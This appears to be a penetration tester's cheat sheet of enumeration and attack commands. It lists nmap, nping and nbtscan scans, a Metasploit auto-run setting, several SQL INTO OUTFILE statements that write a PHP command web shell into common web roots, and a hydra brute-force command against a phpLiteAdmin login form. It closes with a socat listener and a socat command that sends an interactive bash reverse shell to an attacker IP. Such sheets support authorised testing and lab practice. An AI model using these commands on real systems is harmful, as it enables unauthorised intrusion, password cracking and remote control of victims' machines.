[+]======================== Common Enumeration Commands =======================[+]

nmap -n -vvv -T4 -sV -sC -A --osscan-guess --version-all -p- -oA "$target_full_tcp_nmap" $target
nmap -n -vvv -T4 -sV -sC -p- -oA "$target_full_quick_tcp_nmap" $target
nmap -n -vvv -T4 -sV -sC -p- -oA "$target_full_formated_tcp_nmap" --stylesheet https://raw.githubusercontent.com/snovvcrash/snovvcrash.github.io/master/reports/nmap/nmap-bootstrap.xsl $target
nbtscan $target/24

nping –tcp -p 80 -c 4 –flags SYN 10.10.10.48
nping –tcp-connect -c 1 -p 3389 10.1.1.224

set AutoRunScript multi_console_command -r $pwd/payloads_linux/automigrate.rc

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/shell.php"
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/srv/www/shell.php"
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/nginx-default/shell.php"
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/usr/local/apache2/htdocs/shell.php"

# Bruteforce stuff

hydra -l “” -P /usr/share/ncrack/minimal.usr -t 1 -v -V 10.33.1.11 http-post-form /db/phpliteadmin.php:”password=^PASS^&remember=yes&login=Log+In&proc_login=true”:”Incorrect password.”



socat file:tty,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:(attacker IP):4444